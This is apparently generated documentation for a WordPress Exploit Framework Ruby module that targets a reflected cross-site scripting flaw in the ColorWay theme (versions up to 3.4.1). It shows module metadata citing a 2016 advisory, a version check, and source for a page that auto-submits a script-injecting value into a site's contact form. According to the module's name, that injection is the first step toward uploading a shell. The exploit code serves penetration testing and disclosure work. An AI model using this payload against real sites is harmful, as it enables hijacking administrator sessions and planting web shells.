class Wpxf::Exploit::ColorwayReflectedXssShellUpload

Public Class Methods

new() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/colorway_reflected_xss_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'ColorWay <= 3.4.1 Reflected XSS Shell Upload',
    author: [
      'Yorick Koster', # Discovery and disclosure
      'rastating'      # WPXF module
    ],
    references: [
      ['WPVDB', '8568'],
      ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_colorway_wordpress_theme.html']
    ],
    date: 'Jul 26 2016'
  )

  register_option(
    StringOption.new(
      name: 'contact_url',
      desc: 'The URL of a contact form',
      required: true
    )
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/colorway_reflected_xss_shell_upload.rb, line 31
def check
  check_theme_version_from_style('colorway', '3.4.2')
end
initial_script() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/colorway_reflected_xss_shell_upload.rb, line 35
def initial_script
  %|<html><head></head><body><script>
    #{js_post}
    post('#{datastore['contact_url']}', {
      contactName: "\\"><script>#{xss_include_script}<\\/script>",
      email: '#{Utility::Text.rand_alpha(5)}',
      comments: '',
      submitted: 'true'
    });
  </script></body></html>
  |
end